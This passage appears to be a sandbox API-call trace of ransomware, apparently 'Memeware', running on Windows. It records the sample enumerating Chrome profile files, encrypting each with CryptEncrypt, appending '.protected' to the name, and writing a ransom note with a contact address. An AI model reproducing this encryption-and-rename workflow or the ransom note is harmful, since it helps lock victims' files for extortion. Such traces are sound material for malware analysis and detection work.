(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.495] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0078.495] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.495] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0078.495] CloseHandle (hObject=0x154) returned 1 [0078.496] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0078.496] lstrcmpiW (lpString1="Extension State", lpString2="Windows") returned -1 [0078.496] lstrcmpiW (lpString1="Extension State", lpString2="Program Files") returned -1 [0078.496] lstrcmpiW (lpString1="Extension State", lpString2="Program Files (x86)") returned -1 [0078.496] lstrcmpiW (lpString1="Extension State", lpString2="$Recycle.bin") returned 1 [0078.496] lstrcmpiW (lpString1="Extension State", lpString2="System Volume Information") returned -1 [0078.496] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned 95 [0078.496] lstrcmpW (lpString1="Extension State", lpString2=".") returned 1 [0078.496] lstrcmpW (lpString1="Extension State", lpString2="..") returned 1 [0078.496] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\*") returned 97 [0078.496] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0078.505] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.505] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.505] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.505] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.505] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.505] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\.") returned 97 [0078.505] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.505] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.505] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.505] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.505] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.505] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.505] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.505] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\..") returned 98 [0078.505] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.505] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.505] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.506] lstrcmpiW (lpString1="000003.log", lpString2="Windows") returned -1 [0078.506] lstrcmpiW (lpString1="000003.log", lpString2="Program Files") returned -1 [0078.506] lstrcmpiW (lpString1="000003.log", lpString2="Program Files (x86)") returned -1 [0078.506] lstrcmpiW (lpString1="000003.log", lpString2="$Recycle.bin") returned 1 [0078.506] lstrcmpiW (lpString1="000003.log", lpString2="System Volume Information") returned -1 [0078.506] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log") returned 106 [0078.506] StrStrIW (lpFirst="000003.log", lpSrch=".protected") returned 0x0 [0078.506] lstrcmpW (lpString1="000003.log", lpString2="RESTORE_FILES.txt") returned -1 [0078.506] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.506] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.506] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\000003.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.506] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log") returned 106 [0078.506] StrStrW (lpFirst="000003.log", lpSrch=".txt") returned 0x0 [0078.506] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log") returned 106 [0078.506] StrStrW (lpFirst="000003.log", lpSrch=".rar") returned 0x0 [0078.506] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log") returned 106 [0078.506] StrStrW (lpFirst="000003.log", lpSrch=".zip") returned 0x0 [0078.506] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x4ad, lpOverlapped=0x0) returned 1 [0078.516] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffb53, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.516] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x4ad, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x4ad, lpOverlapped=0x0) returned 1 [0078.516] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.516] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.517] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.517] CloseHandle (hObject=0x158) returned 1 [0078.517] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log.protected") returned 116 [0078.517] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\000003.log"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\000003.log.protected")) returned 1 [0078.517] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.517] lstrcmpiW (lpString1="CURRENT", lpString2="Windows") returned -1 [0078.518] lstrcmpiW (lpString1="CURRENT", lpString2="Program Files") returned -1 [0078.518] lstrcmpiW (lpString1="CURRENT", lpString2="Program Files (x86)") returned -1 [0078.518] lstrcmpiW (lpString1="CURRENT", lpString2="$Recycle.bin") returned 1 [0078.518] lstrcmpiW (lpString1="CURRENT", lpString2="System Volume Information") returned -1 [0078.518] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\CURRENT") returned 103 [0078.518] StrStrIW (lpFirst="CURRENT", lpSrch=".protected") returned 0x0 [0078.518] lstrcmpW (lpString1="CURRENT", lpString2="RESTORE_FILES.txt") returned -1 [0078.518] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.518] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.518] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\current"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.518] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\CURRENT") returned 103 [0078.518] StrStrW (lpFirst="CURRENT", lpSrch=".txt") returned 0x0 [0078.518] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\CURRENT") returned 103 [0078.518] StrStrW (lpFirst="CURRENT", lpSrch=".rar") returned 0x0 [0078.518] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\CURRENT") returned 103 [0078.518] StrStrW (lpFirst="CURRENT", lpSrch=".zip") returned 0x0 [0078.518] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x10, lpOverlapped=0x0) returned 1 [0078.519] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffff0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.519] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x10, lpOverlapped=0x0) returned 1 [0078.519] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.519] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.519] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.520] CloseHandle (hObject=0x158) returned 1 [0078.520] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\CURRENT.protected") returned 113 [0078.520] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\current"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\CURRENT.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\current.protected")) returned 1 [0078.520] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.520] lstrcmpiW (lpString1="LOCK", lpString2="Windows") returned -1 [0078.520] lstrcmpiW (lpString1="LOCK", lpString2="Program Files") returned -1 [0078.520] lstrcmpiW (lpString1="LOCK", lpString2="Program Files (x86)") returned -1 [0078.520] lstrcmpiW (lpString1="LOCK", lpString2="$Recycle.bin") returned 1 [0078.520] lstrcmpiW (lpString1="LOCK", lpString2="System Volume Information") returned -1 [0078.521] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOCK") returned 100 [0078.521] StrStrIW (lpFirst="LOCK", lpSrch=".protected") returned 0x0 [0078.521] lstrcmpW (lpString1="LOCK", lpString2="RESTORE_FILES.txt") returned -1 [0078.521] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.521] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.521] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOCK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\lock"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.521] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOCK") returned 100 [0078.521] StrStrW (lpFirst="LOCK", lpSrch=".txt") returned 0x0 [0078.521] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOCK") returned 100 [0078.521] StrStrW (lpFirst="LOCK", lpSrch=".rar") returned 0x0 [0078.521] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOCK") returned 100 [0078.521] StrStrW (lpFirst="LOCK", lpSrch=".zip") returned 0x0 [0078.521] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x0, lpOverlapped=0x0) returned 1 [0078.521] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.521] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x0, lpOverlapped=0x0) returned 1 [0078.521] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.521] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.522] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.522] CloseHandle (hObject=0x158) returned 1 [0078.522] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOCK.protected") returned 110 [0078.522] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOCK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\lock"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOCK.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\lock.protected")) returned 1 [0078.523] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.523] lstrcmpiW (lpString1="LOG", lpString2="Windows") returned -1 [0078.523] lstrcmpiW (lpString1="LOG", lpString2="Program Files") returned -1 [0078.523] lstrcmpiW (lpString1="LOG", lpString2="Program Files (x86)") returned -1 [0078.523] lstrcmpiW (lpString1="LOG", lpString2="$Recycle.bin") returned 1 [0078.523] lstrcmpiW (lpString1="LOG", lpString2="System Volume Information") returned -1 [0078.523] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG") returned 99 [0078.523] StrStrIW (lpFirst="LOG", lpSrch=".protected") returned 0x0 [0078.523] lstrcmpW (lpString1="LOG", lpString2="RESTORE_FILES.txt") returned -1 [0078.523] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.523] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.523] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.524] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG") returned 99 [0078.524] StrStrW (lpFirst="LOG", lpSrch=".txt") returned 0x0 [0078.524] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG") returned 99 [0078.524] StrStrW (lpFirst="LOG", lpSrch=".rar") returned 0x0 [0078.524] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG") returned 99 [0078.524] StrStrW (lpFirst="LOG", lpSrch=".zip") returned 0x0 [0078.524] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x9a, lpOverlapped=0x0) returned 1 [0078.525] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffff66, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.525] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x9a, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x9a, lpOverlapped=0x0) returned 1 [0078.525] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.525] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.525] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.525] CloseHandle (hObject=0x158) returned 1 [0078.525] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG.protected") returned 109 [0078.525] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\log"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\log.protected")) returned 1 [0078.526] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.526] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="Windows") returned -1 [0078.526] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="Program Files") returned -1 [0078.526] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="Program Files (x86)") returned -1 [0078.526] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="$Recycle.bin") returned 1 [0078.526] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="System Volume Information") returned -1 [0078.526] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\MANIFEST-000001") returned 111 [0078.526] StrStrIW (lpFirst="MANIFEST-000001", lpSrch=".protected") returned 0x0 [0078.526] lstrcmpW (lpString1="MANIFEST-000001", lpString2="RESTORE_FILES.txt") returned -1 [0078.526] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.526] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.526] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\manifest-000001"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.527] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\MANIFEST-000001") returned 111 [0078.527] StrStrW (lpFirst="MANIFEST-000001", lpSrch=".txt") returned 0x0 [0078.527] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\MANIFEST-000001") returned 111 [0078.527] StrStrW (lpFirst="MANIFEST-000001", lpSrch=".rar") returned 0x0 [0078.527] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\MANIFEST-000001") returned 111 [0078.527] StrStrW (lpFirst="MANIFEST-000001", lpSrch=".zip") returned 0x0 [0078.527] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x29, lpOverlapped=0x0) returned 1 [0078.528] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffffd7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.528] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, 